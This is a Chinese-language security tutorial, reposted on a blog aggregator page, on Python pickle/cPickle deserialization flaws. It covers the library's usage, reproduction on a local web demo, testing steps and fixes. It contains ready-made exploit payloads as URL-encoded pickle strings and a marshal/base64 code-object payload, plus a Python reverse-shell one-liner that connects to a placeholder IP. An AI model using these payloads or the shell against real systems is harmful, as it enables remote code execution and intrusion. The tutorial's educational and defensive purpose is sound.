当前位置: 首页 > news >正文

Python安全之反序列化——pickle/cPickle

一. 概述

Python中有两个模块可以实现对象的序列化,pickle和cPickle,区别在于cPickle是用C语言实现的,pickle是用纯python语言实现的,用法类似,cPickle的读写效率高一些。使用时一般先尝试导入cPickle,如果失败,再导入pickle模块。

pickle的应用场景一般有以下几种:

1) 在解析认证token,session的时候;

(尤其web中使用的redis、mongodb、memcached等来存储session等状态信息)

2) 将对象Pickle后存储成磁盘文件;

3)将对象Pickle后在网络中传输。

二.用法

pickle 具有两个重要的函数:

1)一个是dump(), 作用是接受一个文件句柄和一个数据对象作为参数,把数据对象以特定的格式保存到给定的文件中;

2)另一个函数是load(),作用是从文件中取出已保存的对象,pickle 知道如何恢复这些对象到他们本来的格式。

使用方式如下:

pickle.dump(obj, file, protocol=None, *, fix_imports=True)  //输出为文件对象
pickle.dumps(obj, protocol=None, *, fix_imports=True)  //输出为 bytes 对象
pickle.load(file)  // load参数是文件句柄
pickle.loads(file)  // loads参数是字符串

三. 漏洞复现

1、本地命令执行

1) 写一个最简单的demo环境,用户输入文件后使用pickle.load方法进行反序列化:

 2) 生成payload,定义执行calc命令的类,使用dumps方法进行序列化并输出到poc.pickle中:

3) 执行此payload:

 

4) 模拟实现一个更为真实的web环境,取路径中的参数后使用cPickle.loads方法反序列化:

5) 将刚才生成的payload进行url编码,请求:

http://127.0.0.1:8000/?payload=cnt%0Asystem%0Ap1%0A(S%27calc%27%0Ap2%0AtRp3%0A.

2、任意代码执行(任意函数构造)

将上述的calc改为下面的字符串可实现反弹shell:

python-c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

这种通过-c参数只能执行相对简单的代码,如果出现了一些自定义函数,要序列化的对象就成了code类型。

但是pickle不能序列化code对象,这里简单测试一下:将要执行的代码都写到一个函数里foo(),尝试反序列化代码对象:

问题解决:从python2.6起,包含了一个可以序列化code对象的模块Marshal。由于python可以在函数当中再导入模块和定义函数,故可以将自己要执行的代码都写到一个函数foo()里:

得到payload:

http://127.0.0.1:8000/?payload=ctypes%0AFunctionType%0A%28cmarshal%0Aloads%0A%28cbase64%0Ab64decode%0A%28S%27YwAAAAABAAAAAgAAAAMAAABzOwAAAGQBAGQAAGwAAH0AAIcAAGYBAGQCAIYAAIkAAGQDAEeIAABkBACDAQBHSHwAAGoBAGQFAIMBAAFkAABTKAYAAABOaf9jAQAAAAEAAAAEAAAAEwAAAHMsAAAAfAAAZAEAawEAchAAfAAAU4gAAHwAAGQBABiDAQCIAAB8AABkAgAYgwEAF1MoAwAAAE5pAQAAAGkCAAAAKAAAAAAoAQAAAHQBAAAAbigBAAAAdAMAAABmaWIoAAAAAHMwAAAARDovb3RoZXIvUHl0aG9uX3NlYy9QaWNrbGVSQ0UvcGlja2xlX3BvY19nZW4wLnB5UgEAAAALAAAAcwYAAAAAAQwBBAFzCQAAAGZpYigxMCkgPWkKAAAAdAQAAABjYWxjKAIAAAB0AgAAAG9zdAYAAABzeXN0ZW0oAQAAAFIDAAAAKAAAAAAoAQAAAFIBAAAAczAAAABEOi9vdGhlci9QeXRob25fc2VjL1BpY2tsZVJDRS9waWNrbGVfcG9jX2dlbjAucHl0AwAAAGZvbwkAAABzCAAAAAABDAEPBA8B%27%0AtRtRc__builtin__%0Aglobals%0A%28tRS%27%27%0AtR%28tR.

3、其他payload:

国外文档:http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdfhttp://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf

 更多payload:GitHub - sensepost/anapickle: Toolset for writing shellcode in Python's Pickle language and for manipulating pickles to inject shellcode.Toolset for writing shellcode in Python's Pickle language and for manipulating pickles to inject shellcode. - sensepost/anapicklehttps://github.com/sensepost/anapickle

四. 测试方法

根据漏洞原理进行测试: 1)查找是否引入pickle/cPickle包;

2)若引入则查看并是否进行了pickle.load(param)或pickle.loads(param)操作;

3) 若参数输入可控,则可能存在反序列化漏洞,构造payload进行利用。

五. 修复方案

1) 确保反序列化对象不可控,且在传递前请进行签名或者加密,防止篡改和重播

2) 如果序列化数据存储在磁盘上,请确保不受信任的第三方不能修改、覆盖或者重新创建自己的序列化数据

3)将 pickle 加载的数据列入白名单,可使用官方推荐的find_class方法,使用白名单限制反序列化引入的对象pickle — Python object serialization — Python 3.7.17 documentationhttps://docs.python.org/3.7/library/pickle.html#pickle-restrict

 六、沙盒绕过

http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdfhttp://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf https://github.com/phith0n/code-breaking/tree/master/2018/picklecodehttps://github.com/phith0n/code-breaking/tree/master/2018/picklecode https://github.com/team-su/SUCTF-2019/tree/master/Misc/guess_gamehttps://github.com/team-su/SUCTF-2019/tree/master/Misc/guess_game

 转载自:Python安全之反序列化——pickle/cPickle-腾讯云开发者社区-腾讯云

相关文章:

  • 基于javaweb的SpringBoot个人博客系统设计和实现(源码+文档+部署讲解)
  • 登录-05.JWT令牌-介绍
  • 【C语言】第五期——函数
  • 第9章:LangChain结构化输出-示例4(基于大模型从自然语言中提取POJO)
  • 【mysql】核心参数,SHOW VARIABLES
  • 再聊OceanBase多副本和高可用
  • 网站快速收录:如何优化网站404页面?
  • 逻辑函数的神经网络实现
  • 250223-Linux/MacOS如何跳过Miniconda的条款阅读,直接安装Miniconda
  • 达梦:开发 ODBC配置指南
  • Linux的目录结构
  • 项目实战--网页五子棋(匹配模块)(4)
  • 【环境配置】maven,mysql,node.js,vue的快速配置与上手
  • openharmony 软总线连接设备数量限制
  • MongoDB#常用语句
  • 垂类大模型微调(二):使用LLaMA-Factory
  • vscode settings(一):全局| 用户设置常用的设置项
  • Steam回退游戏版本
  • 【量化科普】Alpha,阿尔法
  • DeepSeek 从入门到精通:全面掌握 DeepSeek 的核心功能与应用
  • 网站开发设计工程师工作前景/集合竞价口诀背熟6句
  • 徐州做网站/搜索引擎seo是什么
  • 网站怎么做能让人搜到/文章推广平台
  • 公司内部网站一般都怎么维护/谷歌aso优化
  • 南昌做网站比较好的公司/宁波seo关键词
  • 辽宁建设工程信息网场内业绩/宁波seo基础入门